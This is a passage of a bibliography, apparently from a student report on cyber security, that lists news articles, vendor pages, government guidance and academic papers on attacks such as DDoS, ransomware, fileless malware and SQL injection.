KIM ZETTER, 2016. That Insane, $81M Bangladesh Bank Heist? Here's What We Know [viewed Mar 27, 2018]. Available from: https://www.wired.com/2016/05/insane-81m-bangladesh-bank-heist-heres-know/

LILY HAY NEWMAN, 2018. Menacing Malware Shows the Dangers of Industrial System Sabotage. Jan [viewed Mar 22, 2018]. Available from: https://www.wired.com/story/triton-malware-dangers-industrial-system-sabotage/

LILY HAY NEWMAN (b), 2018. GitHub Survived the Biggest DDoS Attack Ever Recorded [viewed Apr 7, 2018]. Available from: https://www.wired.com/story/github-ddos-memcached/

LUDLOW, P., 2013. What Is a 'Hacktivist'? [viewed Mar 27, 2018]. Available from: //opinionator.blogs.nytimes.com/2013/01/13/what-is-a-hacktivist/

MACASKILL, E., 2018. Major cyber-attack on UK a matter of 'when, not if' – security chief [viewed Apr 9, 2018]. Available from: http://www.theguardian.com/technology/2018/jan/22/cyber-attack-on-uk-matter-of-when-not-if-says-security-chief-ciaran-martin

MARIA KOROLOV, 2017. What is a fileless attack? How hackers invade systems without installing software [viewed 05/04/18]. Available from: https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html

MARSH, 2015. Cyber Risk in the Transportation Industry [viewed 23/04/18]. Available from: https://www.marsh.com/content/dam/marsh/Documents/PDF/UK-en/Cyber%20Risk%20in%20the%20Transportation%20Industry-03-2015.pdf

MAURYA, S., 2015. Positive security model based server-side solution for prevention of cross-site scripting attacks. IEEE, pp.1-5.

MURAT BALABAN, 2013. Buffer Overflows Demystified [viewed 04/04/18]. Available from: http://www.enderunix.org/docs/en/bof-eng.txt

MYRSINI ATHINAIOU, 2017. Why Has Healthcare Become Such a Target for Cyber-Attackers? Medical Design Technology, Jul 24.

NCA, 2016. NCA Strategic Cyber Industry Group [viewed 12/04/18]. Available from: http://www.nationalcrimeagency.gov.uk/publications/709-cyber-crime-assessment-2016/file

NCSC, 2016. Protecting your organisation from ransomware [viewed 25/04/18]. Available from: https://www.ncsc.gov.uk/guidance/protecting-your-organisation-ransomware

PAUL STAMP, 2017. Defending Against the Fileless Malware Pandemic That's Infecting Banks Around the Globe [viewed 10/04/18]. Available from: https://www.cybereason.com/blog/defending-against-the-fileless-malware-pandemic-thats-infecting-banks-around-the-globe

PENNY CROSMAN, 2014. How Banks Are Allocating Their Tech Budgets for 2015 [viewed Mar 26, 2018]. Available from: https://www.americanbanker.com/news/how-banks-are-allocating-their-tech-budgets-for-2015

PETERS, S., 2015. The 7 best social engineering attacks ever [viewed 5 January 2016]. Available from: http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411

PING, C., 2017. A second-order SQL injection detection method. IEEE, pp.1792-1796.

PORCHE, I.R.I., 2018. Getting Ready to Fight the Next (Cyber) War [viewed Mar 22, 2018]. Available from: https://www.rand.org/blog/2018/03/getting-ready-to-fight-the-next-cyber-war.html

PWC, 2017. PwC’s 2018 Global Economic Crime and Fraud Survey [viewed Apr 12, 2018]. Available from: https://www.pwc.com/gx/en/services/advisory/forensics/economic-crime-survey.html

RAPID7, 2000. The Most Common Types of Cyber Security Attacks [viewed Mar 25, 2018]. Available from: https://www.rapid7.com/fundamentals/types-of-attacks/

RICKY PUBLICO, 2017. What is a Man-in-the-Middle Attack and How Can You Prevent It? [viewed 11/04/18]. Available from: https://www.globalsign.com/en/blog/what-is-a-man-in-the-middle-attack/

ROUSE, M. (B) and POSTED, 2007. What is denial of service (DoS)? - definition from WhatIs.com [viewed 21 January 2016]. Available from: http://searchsoftwarequality.techtarget.com/definition/denial-of-service

ROUSE, M. and POSTED, 2014. What is social engineering? - definition from WhatIs.com [viewed 5 January 2016]. Available from: http://searchsecurity.techtarget.com/definition/social-engineering

SAHBA KAZEROONI, 2015. The Growing Threat of Denial-of-Service Attacks [viewed Apr 7, 2018]. Available from: https://www.elp.com/articles/powergrid_international/print/volume-20/issue-2/features/the-growing-threat-of-denial-of-service-attacks.html

SANDER RETEL, 2014. Cyber Security Strategy Estonia [viewed 03/03/18]. Available from:

SCHMITT, M.N., 2013. Tallinn manual on the international law applicable to cyber warfare. 1st ed. Cambridge: Cambridge University Press. ISBN 978-1-107-02443-4 [viewed Nov 14, 2017]. Available from: https://www.peacepalacelibrary.nl/ebooks/files/356296245.pdf

SUSAN EVANS, 2005. SYN Flood [viewed 04/04/18]. Available from: https://www.corero.com/resources/ddos-attack-types/syn-flood.html

VANGIE BEAL, 2009. Denial of Service (DoS) Attacks [viewed 04/04/18]. Available from: https://www.webopedia.com/DidYouKnow/Internet/DoS_attack.asp

VARONIS, 2017. 3 Ways Varonis Helps You Fight Ransomware [viewed 25/04/18]. Available from: https://info.varonis.com/hubfs/docs/whitepapers/en/Varonis-Ransomware-Whitepaper.pdf?submissionGuid=c9241111-3144-4fbb-9991-9479fb817a0f

VERIZON, 2014. 2014 Data Breach Investigations Report. Verizon [viewed April 04 2018].

ZEIFMAN, I., 2015. DD4BC's DDoS Extortion Campaign Targets Payment Industry [viewed Apr 9, 2018]. Available from: https://www.incapsula.com/blog/dd4bc-ddos-extortion.html